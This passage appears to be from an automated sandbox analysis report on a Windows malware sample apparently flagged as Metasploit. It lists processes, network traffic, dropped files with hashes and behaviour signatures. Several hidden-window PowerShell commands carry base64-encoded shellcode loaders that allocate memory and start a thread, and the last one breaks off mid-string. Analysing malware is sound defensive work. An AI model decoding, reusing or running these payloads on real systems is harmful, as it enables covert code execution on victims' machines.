BvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJAA5AFYATQAgACQAUABHAHAAVwAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABQAEcAcABXACAAJABlACIAOwB9AA==
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JABuAGYASQAgAD0AIAAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAG4AZgBJACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGIAZQAsADAAeAAzADEALAAwAHgAZABkACwAMAB4ADgAYgAsADAAeAAyADQALAAwAHgAZABhACwAMAB4AGQAYgAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQA4ACwAMAB4ADIAOQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYwAsADAAeAAzADEALAAwAHgANwAwACwAMAB4ADEANQAsADAAeAA4ADMALAAwAHgAYwAwACwAMAB4ADAANAAsADAAeAAwADMALAAwAHgANwAwACwAMAB4ADEAMQAsADAAeABlADIALAAwAHgAYwA0ACwAMAB4ADIAMQAsADAAeAA2ADMALAAwAHgAYQA2ACwAMAB4ADIANgAsADAAeABkAGEALAAwAHgANwA0ACwAMAB4AGMANwAsADAAeABhAGYALAAwAHgAMwBmACwAMAB4ADQANQAsADAAeABjADcALAAwAHgAYwBiACwAMAB4ADMANAAsADAAeABmADYALAAwAHgAZgA3ACwAMAB4ADkAOAAsADAAeAAxADkALAAwAHgAZgBiACwAMAB4ADcAYwAsADAAeABjAGMALAAwAHgAOAA5ACwAMAB4ADgAOAAsADAAeABmADEALAAwAHgAZAA4ACwAMAB4AGIAZQAsADAAeAAzADkALAAwAHgAYgBmACwAMAB4ADMAZQAsADAAeABmADAALAAwAHgAYgBhACwAMAB4AGUAYwAsADAAeAAwADIALAAwAHgAOQAzACwAMAB4ADMAOAAsADAAeABlAGYALAAwAHgANQA2ACwAMAB4ADcAMwAsADAAeAAwADAALAAwAHgAMgAwACwAMAB4AGEAYgAsADAAeAA3ADIALAAwAHgANAA1ACwAMAB4ADUAZAAsADAAeAA0ADEALAAwAHgAMgA2ACwAMAB4ADEAZQAsADAAeAAyADkALAAwAHgAZgA3ACwAMAB4AGQANwAsADAAeAAyAGIALAAwAHgANgA3ACwAMAB4AGMAYgAsADAAeAA1AGMALAAwAHgANgA3ACwAMAB4ADYAOQAsADAAeAA0AGIALAAwAHgAOAAwACwAMAB4ADMAMAAsADAAeAA4ADgALAAwAHgANwBhACwAMAB4ADEANwAsADAAeAA0AGEALAAwAHgAZAAzACwAMAB4ADUAYwAsADAAeAA5ADkALAAwAHgAOQBmACwAMAB4ADYAZgAsADAAeABkADUALAAwAHgAOAAxACwAMAB4AGYAYwAsADAAeAA0AGEALAAwAHgAYQBjACwAMAB4ADMAYQAsADAAeAAzADYALAAwAHgAMgAwACwAMAB4ADIAZgAsADAAeABlAGIALAAwAHgAMAA2ACwAMAB4AGMAOQAsADAAeAA4ADMALAAwAHgAZAAyACwAMAB4AGEANgAsADAAeAAzADgALAAwAHgAZABhACwAMAB4ADEAMwAsADAAeAAwADAALAAwAHgAYQAzACwAMAB4AGEAOQAsADAAeAA2AGQALAAwAHgANwAyACwAMAB4ADUAZQAsADAAeABhADkALAAwAHgAYQA5ACwAMAB4ADAAOAAsADAAeAA4ADQALAAwAHgAMwBjACwAMAB4ADIAYQAsADAAeABhAGEALAAwAHgANABmACwAMAB4AGUANgAsADAAeAA5ADYALAAwAHgANABhACwAMAB4ADgAMwAsADAAeAA3ADAALAAwAHgANQBjACwAMAB4ADQAMAAsADAAeAA2ADgALAAwAHgAZgA3ACwAMAB4ADMAYQAsADAAeAA0ADUALAAwAHgANgBmACwAMAB4AGQANAAsADAAeAAzADAALAAwAHgANwAxACwAMAB4AGUANAAsADAAeABkAGIALAAwAHgAOQA2ACwAMAB4AGYAMwAsADAAeABiAGUALAAwAHgAZgBmACwAMAB4ADMAMgAsADAAeAA1AGYALAAwAHgANgA0ACwAMAB4ADkAZQAsADAAeAA2ADMALAAwAHgAMAA1ACwAMAB4AGMAYgAsADAAeAA5AGYALAAwAHgANwA0ACwAMAB4AGUANgAsADAAeABiADQALAAwAHgAMAA1ACwAMAB4AGYAZQAsADAAeAAwAGIALAAwAHgAYQAwACwAMAB4ADMANAAsADAAeAA1AGQALAAwAHgANAA0ACwAMAB4ADAANQAsADAAeAA3ADQALAAwAHgANQBlACwAMAB4ADkANAAsADAAeAAwADEALAAwAHgAMABmACwAMAB4ADIAZAAsADAAeABhADYALAAwAHgAOABlACwAMAB4AGIAYgAsADAAeABiADkALAAwAHgAOABhACwAMAB4ADQANwAsADAAeAA2ADUALAAwAHgAMwBkACwAMAB4AGUAYwAsADAAeAA3AGQALAAwAHgAZAAxACwAMAB4AGQAMQAsADAAeAAxADMALAAwAHgANwBlACwAMAB4ADIAMQAsADAAeABmAGIALAAwAHgAZAA3ACwAMAB4ADIAYQAsADAAeAA3ADEALAAwAHgAOQAzACwAMAB4AGYAZQAsADAAeAA1ADIALAAwAHgAMQBhACwAMAB4ADYAMwAsADAAeABmAGUALAAwAHgAOAA2ACwAMAB4ADgAYwAsADAAeAAzADMALAAwAHgANQAwACwAMAB4ADcAOQAsADAAeAA2AGMALAAwAHgAZQA0ACwAMAB4ADEAMAAsADAAeAAyADkALAAwAHgAMAA0ACwAMAB4AGUAZQAsADAAeAA5AGUALAAwAHgAMQA2ACwAMAB4ADMANAAsADAAeAAxADEALAAwAHgANwA1ACwAMAB4ADMAZgAsADAAeAA1AGMALAAwAHgAZQA1ACwAMAB4ADcANgAsADAAeAA0ADAALAAwAHgAOQBjACwAMAB4ADgAZQAsADAAeAAxADMALAAwAHgAMwAzACwAMAB4AGUAOAAsADAAeAAwADMALAAwAHgAYgA5ACwAMAB4ADkAZAAsADAAeAA3ADMALAAwAHgAYgAzACwAMAB4ADIAYwAsADAAeABlADIALAAwAHgAMQBiACwAMAB4AGUAMgAsADAAeAA4ADcALAAwAHgAZAA2ACwAMAB4ADUAYgAsADAAeAAwAGIALAAwAHgAMAAyACwAMAB4ADkAZAAsADAAeAAxAGIALAAwAHgAZQA4ACwAMAB4AGMANwAsADAAeABhADgALAAwAHgAYwBiACwAMAB4ADcAOAAsADAAeAAxAGEALAAwAHgAYQBkACwAMAB4AGUAYgAsADAAeAAyADgALAAwAHgAOQAzACwAMAB4ADQAYgAsADAAeAA4ADEALAAwAHgAZAA4ACwAMAB4AGYANQAsADAAeABjADQALAAwAHgAMwBkACwAMAB4ADQAMAAsADAAeAA1AGMALAAwAHgAOQBlACwAMAB4AGQAYwAsADAAeAA4AGQALAAwAHgANABhACwAMAB4AGQAYQAsADAAeABkAGUALAAwAHgAMAA2ACwAMAB4ADcAOQAsADAAeAAxAGEALAAwAHgAOQAwACwAMAB4AGUAZQAsADAAeABmADQALAAwAHgAMAA4ACwAMAB4ADQANAAsADAAeAAxAGYALAAwAHgANAAzACwAMAB4ADcAMgAsADAAeABjADIALAAwAHgAMgAwACwAMAB4ADcAOQAsADAAeAAxADkALAAwAHgAZQBhACwAMAB4AGIANAAsADAAeAA4ADYALAAwAHgAOAA4ACwAMAB4AGIAZAAsADAAeAAyADAALAAwAHgAOAA1ACwAMAB4AGUAZAAsADAAeAA4ADkALAAwAHgAZQBlACwAMAB4ADcANgAsADAAeABkADgALAAwAHgAOAAyACwAMAB4ADIANwAsADAAeABlADMALAAwAHgAYQAzACwAMAB4AGYAYwAsADAAeAA0ADcALAAwAHgAZQAzACwAMAB4ADIAMwAsADAAeABmAGMALAAwAHgAMQAxACwAMAB4ADYAOQAsADAAeAAyADQALAAwAHgAOQA0ACwAMAB4AGMANQAsADAAeABjADkALAAwAHgANwA3ACwAMAB4ADgAMQAsADAAeAAwADkALAAwAHgAYwA0ACwAMAB4AGUAYgAsADAAeAAxAGEALAAwAHgAOQBjACwAMAB4AGUANwAsADAAeAA1AGQALAAwAHgAYwBmACwAMAB4ADMANwAsADAAeAA4ADAALAAwAHgANgAzACwAMAB4ADMANgAsADAAeAA3AGYALAAwAHgAMABmACwAMAB4ADkAYgAsADAAeAAxAGQALAAwAHgAOAAxACwAMAB4ADcAMwAsADAAeAA0AGEALAAwAHgANQBiACwAMAB4AGYANwAsADAAeAA5AGQALAAwAHgANABlADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABGAGUAUwBOAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABGAGUAUwBOAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABGAGUAUwBOACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7AA==
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uzywrygi\uzywrygi.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES414F.tmp" "c:\Users\Admin\AppData\Local\Temp\uzywrygi\CSC2CE0F1BBE9C943938DB8A4B02DA6D6C7.TMP"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | testme.com | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 72.15.174.6:80 | tcp | |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.27.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | udp |
Files
memory/720-0-0x0000000000400000-0x0000000000476000-memory.dmp
memory/3644-1-0x0000000074E7E000-0x0000000074E7F000-memory.dmp
memory/3644-2-0x0000000002ED0000-0x0000000002F06000-memory.dmp
memory/3644-4-0x0000000074E70000-0x0000000075620000-memory.dmp
memory/3644-3-0x0000000005B80000-0x00000000061A8000-memory.dmp
memory/3644-6-0x0000000005970000-0x00000000059D6000-memory.dmp
memory/3644-8-0x0000000074E70000-0x0000000075620000-memory.dmp
memory/3644-5-0x00000000056D0000-0x00000000056F2000-memory.dmp
memory/3644-7-0x0000000005AE0000-0x0000000005B46000-memory.dmp
memory/3644-9-0x00000000061B0000-0x0000000006504000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0rpvq3ti.e51.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3644-19-0x0000000006790000-0x00000000067AE000-memory.dmp
memory/3644-20-0x0000000006830000-0x000000000687C000-memory.dmp
memory/1988-21-0x0000000074E70000-0x0000000075620000-memory.dmp
memory/1988-22-0x0000000074E70000-0x0000000075620000-memory.dmp
memory/1988-32-0x0000000007900000-0x0000000007F7A000-memory.dmp
memory/1988-33-0x0000000006490000-0x00000000064AA000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\uzywrygi\uzywrygi.cmdline
| MD5 | 9b594472d3edd2866e41a9409e174c28 |
| SHA1 | fb712249b60038b2d2b4c690acf70a7c78774281 |
| SHA256 | 962cfab3660f467575af9bd80140232b991b0eb58f8c5ac5cc8e35229376f17c |
| SHA512 | ef277ee443c64be051e9add3a2d2ec818b519223739fababc9806784fb05017e508f4eaf31bfb4bb618a22772048ea358d966302f6095972f3f3466d2901bbaa |
\??\c:\Users\Admin\AppData\Local\Temp\uzywrygi\uzywrygi.0.cs
| MD5 | 7319070c34daa5f6f2ece2dfc07119ee |
| SHA1 | f26a4a48518a5608e93c8b77368f588b0433973c |
| SHA256 | b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc |
| SHA512 | 34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd |
\??\c:\Users\Admin\AppData\Local\Temp\uzywrygi\CSC2CE0F1BBE9C943938DB8A4B02DA6D6C7.TMP
| MD5 | 7b179e0bbe6cdabcb8adb8846f7ab4e8 |
| SHA1 | d7e4dfdf2f378f889f652008abd204c81de3660b |
| SHA256 | 5b850be8355ad0509406ad1d3ced0173a62b7dd4c7004437669fd12f1ac3edec |
| SHA512 | ac5143f24ddace9a581653e8ed80bda120f93544a822a16d3a3552e57f9c666c60075d76e4cbff8b4f10199f23375655fa8a5109565edf84a398d7383d310e35 |
C:\Users\Admin\AppData\Local\Temp\RES414F.tmp
| MD5 | 32301361b323937c28a85c9e3626607b |
| SHA1 | 4476c5069156ae769ee91eef123c51204f20468c |
| SHA256 | e3da5c07c50ac0166d7a7391687a256973c6c59e01a2dc147c376bcb3f383aa6 |
| SHA512 | 5c7cd2b42fed276f134261677fdb3f733e6ae4e45bd9d10a974de93f90440fd75bd93c024e2fe2f4c2bef24f0c032deffb933d62855f9051ebd4d8651c4ef243 |
memory/5004-55-0x0000000006080000-0x0000000006088000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\uzywrygi\uzywrygi.dll
| MD5 | 71bbf2f34607364c50420c9db477d25c |
| SHA1 | 78febc656937380b72684fa09f74d707d5a669eb |
| SHA256 | d3dcc264749ebcef1489722ddd0a1f72547cde119d091b50c53eec33d8b4a9a5 |
| SHA512 | a5d8532c9a8bc43d3d2681e8a96dd67a277d62be5bf90cab9d135132eeccfda570634e803ca87a14fac959e22e1db9559b09841e27387cb72c9ffbc0df4ad139 |
memory/5004-57-0x0000000006CE0000-0x0000000006CE1000-memory.dmp
memory/3644-59-0x0000000074E7E000-0x0000000074E7F000-memory.dmp
memory/3644-60-0x0000000074E70000-0x0000000075620000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | 06ad34f9739c5159b4d92d702545bd49 |
| SHA1 | 9152a0d4f153f3f40f7e606be75f81b582ee0c17 |
| SHA256 | 474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba |
| SHA512 | c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92 |
memory/1988-63-0x0000000074E70000-0x0000000075620000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-22 21:48
Reported
2024-06-22 21:50
Platform
win7-20240508-en
Max time kernel
149s
Max time network
149s
Command Line
Signatures
MetaSploit
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -window hidden -EncodedCommand JABTADIAaQAgAD0AIAAnACQAbgBmAEkAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAbgBmAEkAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgBlACwAMAB4ADMAMQAsADAAeABkAGQALAAwAHgAOABiACwAMAB4ADIANAAsADAAeABkAGEALAAwAHgAZABiACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1ADgALAAwAHgAMgA5ACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABjACwAMAB4ADMAMQAsADAAeAA3ADAALAAwAHgAMQA1ACwAMAB4ADgAMwAsADAAeABjADAALAAwAHgAMAA0ACwAMAB4ADAAMwAsADAAeAA3ADAALAAwAHgAMQAxACwAMAB4AGUAMgAsADAAeABjADQALAAwAHgAMgAxACwAMAB4ADYAMwAsADAAeABhADYALAAwAHgAMgA2ACwAMAB4AGQAYQAsADAAeAA3ADQALAAwAHgAYwA3ACwAMAB4AGEAZgAsADAAeAAzAGYALAAwAHgANAA1ACwAMAB4AGMANwAsADAAeABjAGIALAAwAHgAMwA0ACwAMAB4AGYANgAsADAAeABmADcALAAwAHgAOQA4ACwAMAB4ADEAOQAsADAAeABmAGIALAAwAHgANwBjACwAMAB4AGMAYwAsADAAeAA4ADkALAAwAHgAOAA4ACwAMAB4AGYAMQAsADAAeABkADgALAAwAHgAYgBlACwAMAB4ADMAOQAsADAAeABiAGYALAAwAHgAMwBlACwAMAB4AGYAMAAsADAAeABiAGEALAAwAHgAZQBjACwAMAB4ADAAMgAsADAAeAA5ADMALAAwAHgAMwA4ACwAMAB4AGUAZgAsADAAeAA1ADYALAAwAHgANwAzACwAMAB4ADAAMAAsADAAeAAyADAALAAwAHgAYQBiACwAMAB4ADcAMgAsADAAeAA0ADUALAAwAHgANQBkACwAMAB4ADQAMQAsADAAeAAyADYALAAwAHgAMQBlACwAMAB4ADIAOQAsADAAeABmADcALAAwAHgAZAA3ACwAMAB4ADIAYgAsADAAeAA2ADcALAAwAHgAYwBiACwAMAB4ADUAYwAsADAAeAA2ADcALAAwAHgANgA5ACwAMAB4ADQAYgAsADAAeAA4ADAALAAwAHgAMwAwACwAMAB4ADgAOAAsADAAeAA3AGEALAAwAHgAMQA3ACwAMAB4ADQAYQAsADAAeABkADMALAAwAHgANQBjACwAMAB4ADkAOQAsADAAeAA5AGYALAAwAHgANgBmACwAMAB4AGQANQAsADAAeAA4ADEALAAwAHgAZgBjACwAMAB4ADQAYQAsADAAeABhAGMALAAwAHgAMwBhACwAMAB4ADMANgAsADAAeAAyADAALAAwAHgAMgBmACwAMAB4AGUAYgAsADAAeAAwADYALAAwAHgAYwA5ACwAMAB4ADgAMwAsADAAeABkADIALAAwAHgAYQA2ACwAMAB4ADMAOAAsADAAeABkAGEALAAwAHgAMQAzACwAMAB4ADAAMAAsADAAeABhADMALAAwAHgAYQA5ACwAMAB4ADYAZAAsADAAeAA3ADIALAAwAHgANQBlACwAMAB4AGEAOQAsADAAeABhADkALAAwAHgAMAA4ACwAMAB4ADgANAAsADAAeAAzAGMALAAwAHgAMgBhACwAMAB4AGEAYQAsADAAeAA0AGYALAAwAHgAZQA2ACwAMAB4ADkANgAsADAAeAA0AGEALAAwAHgAOAAzACwAMAB4ADcAMAAsADAAeAA1AGMALAAwAHgANAAwACwAMAB4ADYAOAAsADAAeABmADcALAAwAHgAMwBhACwAMAB4ADQANQAsADAAeAA2AGYALAAwAHgAZAA0ACwAMAB4ADMAMAAsADAAeAA3ADEALAAwAHgAZQA0ACwAMAB4AGQAYgAsADAAeAA5ADYALAAwAHgAZgAzACwAMAB4AGIAZQAsADAAeABmAGYALAAwAHgAMwAyACwAMAB4ADUAZgAsADAAeAA2ADQALAAwAHgAOQBlACwAMAB4ADYAMwAsADAAeAAwADUALAAwAHgAYwBiACwAMAB4ADkAZgAsADAAeAA3ADQALAAwAHgAZQA2ACwAMAB4AGIANAAsADAAeAAwADUALAAwAHgAZgBlACwAMAB4ADAAYgAsADAAeABhADAALAAwAHgAMwA0ACwAMAB4ADUAZAAsADAAeAA0ADQALAAwAHgAMAA1ACwAMAB4ADcANAAsADAAeAA1AGUALAAwAHgAOQA0ACwAMAB4ADAAMQAsADAAeAAwAGYALAAwAHgAMgBkACwAMAB4AGEANgAsADAAeAA4AGUALAAwAHgAYgBiACwAMAB4AGIAOQAsADAAeAA4AGEALAAwAHgANAA3ACwAMAB4ADYANQAsADAAeAAzAGQALAAwAHgAZQBjACwAMAB4ADcAZAAsADAAeABkADEALAAwAHgAZAAxACwAMAB4ADEAMwAsADAAeAA3AGUALAAwAHgAMgAxACwAMAB4AGYAYgAsADAAeABkADcALAAwAHgAMgBhACwAMAB4ADcAMQAsADAAeAA5ADMALAAwAHgAZgBlACwAMAB4ADUAMgAsADAAeAAxAGEALAAwAHgANgAzACwAMAB4AGYAZQAsADAAeAA4ADYALAAwAHgAOABjACwAMAB4ADMAMwAsADAAeAA1ADAALAA